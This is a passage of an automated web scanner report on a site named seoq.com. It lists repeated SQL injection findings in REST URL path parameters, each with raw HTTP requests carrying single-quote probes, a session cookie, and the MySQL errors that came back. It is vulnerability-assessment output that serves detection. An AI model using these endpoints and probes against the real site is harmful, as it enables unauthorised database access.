<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
1.31. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2270/N

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /quotient/2011/04/22/2270'/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:01 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53789


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and
' at line 1</span>
...[SNIP]...
1.32. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2270/N

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /quotient/2011/04/22/2270/N' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:26 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53610


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''N'' ORDER BY `report_date` DESC LIMIT 2' at line 2</span>
...[SNIP]...

Request 2

GET /quotient/2011/04/22/2270/N'' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:26 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:27 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
1.33. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2271/N

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /quotient/2011/04/22/2271'/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:08 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53789


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and
' at line 1</span>
...[SNIP]...
1.34. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2271/N

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /quotient/2011/04/22/2271/N' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:32 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53610


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''N'' ORDER BY `report_date` DESC LIMIT 2' at line 2</span>
...[SNIP]...

Request 2

GET /quotient/2011/04/22/2271/N'' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:33 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:33 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
1.35. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2272/N

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /quotient/2011/04/22/2272'/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:56 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53789


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and
' at line 1</span>
...[SNIP]...
1.36. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2272/N

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /quotient/2011/04/22/2272/N' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:23 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53610


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''N'' ORDER BY `report_date` DESC LIMIT 2' at line 2</span>
...[SNIP]...

Request 2

GET /quotient/2011/04/22/2272/N'' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:23 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:23 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
1.37. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2837/N

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /quotient/2011/05/01/2837'/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:57 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53789


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and
' at line 1</span>
...[SNIP]...
1.38. http://www.seoq.com/quotient/2011/05/01/2837/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2837/N

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /quotient/2011/05/01/2837/N' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:16 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53610


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''N'' ORDER BY `report_date` DESC LIMIT 2' at line 2</span>
...[SNIP]...

Request 2

GET /quotient/2011/05/01/2837/N'' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:16 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:55:16 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
1.39. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2838/N

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /quotient/2011/05/01/2838'/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:43 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53789


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and
' at line 1</span>
...[SNIP]...
1.40. http://www.seoq.com/quotient/2011/05/01/2838/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2838/N

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /quotient/2011/05/01/2838/N' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:00 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53610


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''N'' ORDER BY `report_date` DESC LIMIT 2' at line 2</span>
...[SNIP]...

Request 2

GET /quotient/2011/05/01/2838/N'' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:01 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:55:01 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
1.41. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2839/N

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /quotient/2011/05/01/2839'/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:51 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53789


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and
' at line 1</span>
...[SNIP]...
1.42. http://www.seoq.com/quotient/2011/05/01/2839/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2839/N

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /quotient/2011/05/01/2839/N' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:10 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53610


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''N'' ORDER BY `report_date` DESC LIMIT 2' at line 2</span>
...[SNIP]...

Request 2

GET /quotient/2011/05/01/2839/N'' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:10 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:55:10 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
1.43. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2840/N

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 5, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /quotient/2011/05/01/2840'/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:37 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53789


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and
' at line 1</span>
...[SNIP]...
1.44. http://www.seoq.com/quotient/2011/05/01/2840/N [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2840/N

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /quotient/2011/05/01/2840/N' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:56 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53610


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''N'' ORDER BY `report_date` DESC LIMIT 2' at line 2</span>
...[SNIP]...

Request 2

GET /quotient/2011/05/01/2840/N'' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:57 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
